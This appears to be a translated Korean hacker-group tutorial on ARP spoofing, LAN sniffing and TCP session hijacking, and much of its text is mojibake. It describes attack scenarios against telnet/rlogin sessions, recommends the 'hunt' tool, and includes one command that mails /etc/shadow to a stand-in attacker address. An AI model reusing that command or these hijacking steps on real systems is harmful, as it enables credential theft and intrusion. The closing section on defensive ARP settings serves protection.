############################################################## * Mr8 >WowCode && OverHead Member At Wowhacker<temp>arp -a ´ç½ÅÀÌ swithched LAN ¼¼±×¸ÕÆ®³»¿¡¼­ ¿¬°áÇϰí ÀÖ´Â IP ÁÖ¼Ò ¹× MAC ÁÖ¼Ò ¿¡ ´ëÇØ¼­ º¼¼ö ÀÖ°Ô µË´Ï´Ù. (¸®´ª½º ¿ª½Ã µ¿ÀÏÇÕ´Ï´Ù.) ¿©±â¸¦ º¸¸é atp tableÀÌ º¸¿©Áý´Ï´Ù. C:\>arp -a Interface: 169.254.0.2 on Interface 0x2000002 Internet-address MAC address Type 169.254.0.1 00-10-4b-01-88-f3 dynamic 169.254.0.101 00-e0-4c-39-65-6d dynamic o 169.254.0.2 ´ç½ÅÀÇ IP o 0x2000002 ´ç½ÅÀÌ »ç¿ëÁßÀÎ ÀÎÅÍÆäÀ̽ºÀÇ ÄÚµå(¿©±â¼­´Âppp0) o 169.254.0.1 ´ç½ÅÀÌ ÇöÀç ¿¬°áÁßÀÎ IP o 00-10-4b-01-88-f3 ÇØ´ç ¸Ó½ÅÀÇ MAC ÁÖ¼Ò o dynamic ¿¬°á ÇüÅ ³» Äİú 169.254.0.1»çÀÌÀÇ Åë½Å »óÅ¿¡ ´ëÇØ¼­ ¾Ë¾Æ º¸°Ú½À´Ï´Ù ³ª´Â ³ªÀÇ IP,MACÁÖ¼Ò¿¡ ´ëÇÑ arp tableÀ» °¡Áö°í ÀÖ½À´Ï´Ù. ÀÌ °ªÀº 30ÃÊ¿¡ Çѹø¾¿ °»½ÅµÇ°Ô µË´Ï´Ù. ¸¸¾à, ¾ÇÀǸ¦ °¡Áø »ç¿ëÀÚ°¡ 169.254.0.1, Á¸ÀçÇÏÁö ¾Ê´Â MACÁÖ¼Ò¸¦ Æ÷ÇÔÇÑ ÇãÀ§ ÆÐŶÀ» ³ª¿¡°Ô º¸³»¸é ¾î¶»°Ô µÉ±î¿ä? ÃÖ¼ÒÇÑ, 30Ãʵ¿¾ÈÀº 169.254.01°úÀÇ Åë½ÅÀÌ ºÒ°¡´ÉÇØÁý´Ï´Ù. °ø°ÝÀÚ°¡ ³ªÀÇ ¼¼¼ÇÀ» °¡·Îä±â¿£ ÃæºÐÇÕ´Ï´Ù. ³×Æ®¿öÅ© ¼¼±×¸ÕÆ®ÀÇ ´ÙÀ½ ºÎºÐÀ» º¸½Ã±â ¹Ù¶ø´Ï´Ù. A-------------->| D-------------->|B--------------->C E-------------->| A,D,E´Â B¿¡ ¿¬°áµÇ¾ú°í, C´Â ¿ÀÁ÷ B¿¡ ¿¬°áµÇ¾îÀÖ½À´Ï´Ù. B´Â Áß¾Ó¿¡ ÀÖ°í, À̰ÍÀº C,A,D,E°¡ ¿ÀÁ÷ B¿Í ÇÔ²² ÇÏ´Â traffic¸¸À» ½º´ÏÆÛ¸µÇÒ¼ö ÀÖ´Ù´Â °Ì´Ï´Ù. C¸¦ ÇØÄ¿¶ó °¡Á¤Çϰí, ±×°¡ ¸ðµç°ÍÀ» ½º´ÏÆÛ¸µÇÏ°í ½Í¾îÇÑ´Ù¸é, ±×´Â ¾î¶»°Ô ÇØ¾ß ÇÒ±î¿ä? A,D,E,C´Â B¿¡ ´ëÇÑ ±×µéÀÇ arp table ¸ñ·ÏÀ» Áö°í ÀÖ°í, B´Â A,C,D,EÀÇ °ÍÀ» °¡Áö°í ÀÖ½À´Ï´Ù. ¸¸¾à, A,D,E°¡ C¿¡ ´ëÇÑ ¸ñ·ÏÀ» ¾ò°Ô µÈ´Ù¸é, C´Â Æ®·¡ÇÈÀ» ½º´ÏÆÛ¸µ ÇÒ¼ö ÀÖ°Ô µÉ°ÍÀÔ´Ï´Ù. ´Þ¸®¸»Çϸé, C´Â ¹Ýµå½Ã ÇØ´çIP¿Í Á¸ÀçÇÏÁö ¾Ê´Â MACÁÖ¼Ò¸¦ Æ÷ÇÔÇÏ¿© ±×µé¿¡°Ô arp ÀÀ´äÀ» º¸³»¾ß¸¸ ÇÕ´Ï´Ù. ÀÌ ±â¹ýÀº ½ºÀ§Ä¡ º¹»ç·Î ºÒ¸®¿ó´Ï´Ù. A,D ±×¸®°í E´Â C¿¡°Ô º¸³»¾ßÇÒ ÆÐŶ ÀÇ MACÁÖ¼Ò¸¦ ãÀ»¼ö ¾ø½À´Ï´Ù. ±×·¡¼­ C´Â Á¤º¸¿¡ ´ëÇÑ ½º´ÏÆÛ¸µ ÀÌ °¡´ÉÇØ Áö´Â °Ì´Ï´Ù. 3. °ø°Ý LAN°ú switched LAN¿¡ Àû¿ëµË´Ï´Ù. eth0 ´ë½Å ppp0À» »ç¿ëÇÏ´Â °÷Àº ¹°·Ð, ´Ù¸¥ ¸ðµç °¡´ÉÇÑ ´Ù¹ÙÀ̽º ¿¡µµ Àû¿ëµË´Ï´Ù. ½ÃÀÛÇϱâÀü¿¡ ¾à°£ÀÇ ÁÖÀÇ»çÇ×ÀÌ ÀÖ½À´Ï´Ù. o ÇãÁ¢Àº Æò»óÀûÀÎ ÄÄÇ»ÅÍ »ç¿ëÀÚ o ¼­¹ö´Â ¼­¹ö o ÇØÄ¿´Â ÀÌ ±â¹ýÀ» ÀÌÇØÇÑ »ç¶÷(Å©·¡Ä¿´Â ÇÊ¿ä ¾ø½À´Ï´Ù.) 1) ÇãÁ¢ÀÌ SSH¸¦ Á¦¿ÜÇϰí telnet,rlogin,ftpµîÀ» ÀÌ¿ëÇØ ¼­¹ö¿¡ Á¢¼ÓÇÔ 2) ÇØÄ¿´Â ÇãÁ¢¿¡°Ô ¼­¹öÀÇ IP¿Í °ÅÁþ MAC ÁÖ¼Ò°¡ Æ÷ÇÔµÈ ÇãÀ§ ÆÐŶÀ» º¸³¿ 3) ÇØÄ¿´Â ¼­¹ö¿¡°Ô ¹Ùº¸ÀÇ IP¿Í °ÅÁþ MACÁÖ¼Ò°¡ Æ÷ÇÔµÈ arp ÆÐŶÀ» º¸³¿ 4) ¼­¹ö¿Í ÇãÁ¢ »çÀÌÀÇ ¿¬°áÀº 30Ãʰ£ Á¤Áö 5) ÇØÄ¿´Â ÇãÁ¢Ã³·³ À§ÀåÇÏ¿© ƯÁ¤¸í·ÉÀ» ¼­¹ö¿¡ ¼öÇà ~ ¶Ç ´Ù¸¥ ½Ã³ª¸®¿À ~ 1) ÇãÁ¢ÀÌ SSH¸¦ Á¦¿ÜÇϰí telnet,rlogin,ftpµîÀ» ÀÌ¿ëÇØ ¼­¹ö¿¡ Á¢¼ÓÇÔ 2) ÇØÄ¿´Â °ÅÁþ MACÁÖ¼Ò¸¦ Æ÷ÇÔÇÑ arp ÆÐŶÀ» ÇãÁ¢¿¡°Ô º¸³¿ 3) ÇØÄ¿´Â °ÅÁþ MACÁÖ¼Ò¸¦ Æ÷ÇÔÇÑ arp ÆÐŶÀ» ¼­¹ö¿¡°Ô º¸³¿ 4) ÇØÄ¿´Â ÇãÁ¢°ú ¼­¹ö»çÀÌÀÇ ´ëÈ­¸¦ ½º´ÏÆÛ¸µÇÒ¼ö ÀÖÀ½ Áö±Ý ÇãÁ¢°ú ¼­¹ö´Â ÁøÂ¥ MACÁÖ¼Ò¸¦ ãÀ»¼ö ¾ø±â ¶§¹®¿¡ ¼Û½ÅÀÚ¿¡°Ô µ¥ÀÌŸ¸¦ º¸³»°Ô µË´Ï´Ù. ÇØÄ¿¿¡°Ô·Î. Pavel Krauszr°¡ Á¦ÀÛÇÑ hunt¶ó´Â Ź¿ùÇÑ µµ±¸´Â, µ¥¸óó·³ ¹ß°ßµÇµµ·Ï MACÀ» ¸¸µé°í, ½ºÀ§Ä¡¿¡ ¿¬°áµÇ´Â ´Ù¸¥ µð¹ÙÀ̽º¸¦ °Ë»ç¸¦ °¡´ÉÇÏ°Ô ÇÕ´Ï´Ù. À§¿¡¼­ »ìÆìº» ±â¹ýµéÀÌ, LANÀº ¹°·Ð Intenet¿¡µµ Àû¿ëµÇ°Ô ¸»ÀÔ´Ï´Ù. 4. IP ÇÏÀÌÁ§Å· ³ª¸¦ ÇãÁ¢À̶ó°í °¡Á¤Çϰí, ³ª´Â º¸¾È°ü·Ã Áö½ÄÀÌ ¾øÀ¸¸ç telnet°ú ssh»çÀÌ ÀÇ Â÷ÀÌÁ¡µµ ¸ð¸¨´Ï´Ù. ³ª´Â Áý¿¡¼­ ¼­¹ö·Î Á¢¼ÓÇÒ¶§ telnet¸¦ ÀÌ¿ëÇÕ´Ï´Ù. ³ª´Â ID,PW¸¦ ÀÔ·ÂÇϰí, ¾î¶°ÇÑ ÇüÅÂÀÇ ÀÎÁõ¾øÀÌ DataµéÀ» º¯È­½Ãų °ÍÀÔ´Ï´Ù. À̶§, °ø°ÝÀÚ´Â ½º´ÏÆÛ¸µÀ» ÇÏ¸ç ³ªÀÇ SEQ/ACK ³Ñ¹ö¸¦ Àâ¾ÆÃ§°ÍÀ̰í arp °ø°ÝÀ» »ç¿ëÇÏ¿© ³ªÀÇ Á¢¼ÓÀ» ÃʱâÈ­ ½ÃÄѹö¸°ÈÄ ³ªÀÇ °ø°£¿¡ ¸í·É¾îµéÀ» Áý¾î ³Ö¾î ¹ö¸®°Ô µÉ°ÍÀÔ´Ï´Ù. ±×´Â ¸Å¿ì ¼Õ½±°Ô ³ªÀÇ ¼­¹ö¿¡ ¹éµµ¾î¸¦ ¸¸µé¼ö ÀÖ½À´Ï´Ù. #mail evil@hackers.com < /etc/shadow ±×·¯³ª, ÇØÄ¿´Â °ø°Ý°ú ÇÔ²² ¹ß»ýÇÑ ACK ÆøÇ³ÀÇ ¹æÇظ¦ ¸·±âÀ§ÇØ ¹Ýµå½Ã arp poisoning À̳ª ±âŸ SYN flooding °°Àº ¹æ¹ýÀ» ÅëÇØ ³ª¸¦ ¼­ºñ½º °ÅºÎ¸¦ ½ÃÄÑ¾ß ÇÕ´Ï´Ù. Äɺó ¹ÌÆ®´ÐÀÌ ¾î¶»°Ô Âʹٸ®ÀÇ ³×Æ®¿öÅ©¸¦ ÇØÅ·Çß´ÂÁö ±â¾ï³ª½Ã³ª¿ä? Âʹٸ®´Â ±× ³×Æ®¿öÅ©ÀÌ ÁÖÀÎÀ̾ú±â ¶§¹®¿¡ rloginÀ» »ç¿ëÁßÀ̾ú°í ±×·¸±â ¶§¹®¿¡ ½Ã³ë¹«¶ó´Â ÇØ´ç ³×Æ®¿öÅ©ÀÇ ¸ðµç ÄÄÇ»Å͸¦ ¹Ï°í ÀÖ ¾ú¾ú´ø °ÍÀÔ´Ï´Ù. ¹ÌÆ®´ÐÀº ½Å·ÚÇÏ´Â °ø°£ ¹Û¿¡ À§Ä¡ÇßÁö¸¸, ½Å·Ú¹Þ°í ÀÖ´Â ÇÑ ÄÄÇ»Å͸¦ ¹ß°ßÇÏ¿´½À´Ï´Ù. ¿¹Àü S/W´Â ID ¿¹Ãø¿¡ ´ëÇÑ ¹®Á¦Á¡ÀÌ ÀÖ¾ú±â ¶§¹®¿¡ ±×´Â ¼Õ½±°Ô seq/ack¸¦ ÃßÃøÇÏ¿´½À´Ï´Ù. ¿À´Ã³¯ ¿ì¸®°¡ Á¤È®ÇÑ ID¸¦ ¿¹ÃøÇÏ´Â °ÍÀº ¸Å¿ì ¾î·Æ±â ¶§¹®¿¡ DNS ij½Ì poisoning/IP ½ºÇªÇÎÀº ½ÃµµÇÏ±â ¾î·Æ½À´Ï´Ù. ±×·¯³ª, arp ½ºÇªÇÎ ÀÌ ÀÖ½À´Ï´Ù. ³»°¡ »ý°¢Çϱ⿣, multithreaded ¹«Â÷º° °ø°ÝÀÌ Á¦´ë·Î ÀÛµ¿ÇÏ°Ô µÈ´Ù¸é ´ç½ÅÀÌ Çàº¹ÇØÁö±â¿£ ÃæºÐÇÒ°ÍÀÔ´Ï´Ù. 5. µµ±¸µé Hunt´Â Å×½ºÆ® ÇØº» µµ±¸Áß ÃÖ»óÀ̾ú½À´Ï´Ù. (¿ªÀÚÁÖ : ÀúÀÚ ¸¶À½´ë·Î ³ª¿­Çؼ­ ¿ªÀÚ ¸¶À½´ë·Î »ý·« ¤Ñ¤ÑV) 6. ´ç½ÅÀÇ ½Ã½ºÅÛÀ» Áö۱⠴ÙÀ½¸í·É°ú °°ÀÌ arp tableÀ» Àá±Å(static) µÎ±â ¹Ù¶ø´Ï´Ù. [root@server]#arp -v -i eth0 -s 213.233.70.1 00:31:6B:94:32:A8 ´ç½ÅÀº À§ ¸í·ÉÀ¸·Î arp entrtyÀÇ »èÁ¦/°»½Å/Ãß°¡°¡ ¾ÈµÇ´Â ¹®Á¦Á¡À» ¹ß°ßÇÒ¼öµµ ÀÖ½À´Ï´Ù. ³»°¡ ¾Æ´Â Çѵµ¿¡¼­ FreeBSD´Â Á¤È®ÇÑ ÀÎÀÚ¸¦ Æ÷ÇÔÇÏ¿© Ä¿³ÎÀ» ÄÄÆÄÀÏ ÇÑ´Ù¸é ¿Ïº®ÇÑ º¸¾È»óŸ¦ ¸¸µé¼ö ÀÖ½À´Ï´Ù. ±× ºÎºÐÀº ´Ù¸¥ °ü·Ã ¹®¼­¸¦ º¸½Ã±â ¹Ù¶ø´Ï´Ù. 7. ³ªÀÇ ´ÙÀ½ °èȹ LANÀ» ¿ä±¸ÇÏÁö ¾Ê´Â ÇÏÀÌÁ§Å· µµ±¸¸¦ ¸¸µéÁö ¸ð¸¨´Ï´Ù. ±×°ÍÀº ppp0/eth0 ¿¡ ÇØ´çÇÏÁö¸¸ ÀÎÅͳݻ󿡼­¸¸ ÀÛµ¿ÇÏ°Ô µÉ°ÍÀÔ´Ï´Ù. ³×, ³ª´Â SEQ/ACK ÀÎÁõ Á¤º¸¸¦ ¾òÀ»¼ö ¾ø°í ³ª´Â ±×°ÍÀ» ¹«Â÷º°´ëÀÔÀûÀ¸·Î ¾Ë¾Æ ³»¾ß ÇϹǷΠ±×°ÍÀÌ ÈûµçÀÏÀÌ µÉ°ÍÀÓÀ» ¾Ð´Ï´Ù. ³»°¡ ¿îÀÌ ÁÁ´õ¶óµµ, ±×°ÍÀº »ó´çÈ÷ ¸¹Àº ½Ã°£À» ÀÛ¾÷ÇØ¾ß ¿Ï¼º µÉ°ÍÀÔ´Ï´Ù. ±×·¯³ª, ³ª¿¡°Ô »ý°¢ÀÌ ÀÖ½À´Ï´Ù. A multithreaded hijacking tool À̰ÍÀÌ °¡¼Óµµ¸¦ ºÙ¿© ÁÙ°ÍÀÔ´Ï´Ù. ±×·¯³ª, ³ª´Â code¿¡ °üÇØ Á¶±ÝÀÇ ¹®Á¦°¡ ÀÖ½À´Ï´Ù. ¸¸¾à, ³ª¸¦ µµ¿Í ÁÖ°í ½Í´Ù¸é ¸ÞÀÏÀ» Áֱ⠹ٶø´Ï´Ù. ³ª´Â ¹«Ã´ °í¸¶¿Í ÇÒ°ÍÀÔ´Ï´Ù. oo ÁÁÀº À̵é zwanderer - À̱ÛÀ» ÀÐ´Â´Ù¸é ±×¿¡°Ô °¨»çÇØ¶ó dataholic - ¸®´ª½º ¼³Ä¡ suspect - Á¶¾ð°¡ Silver - ¿µ¾î ÀÛ¹®À» µµ¿Í ÁØÀÌ EOF >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>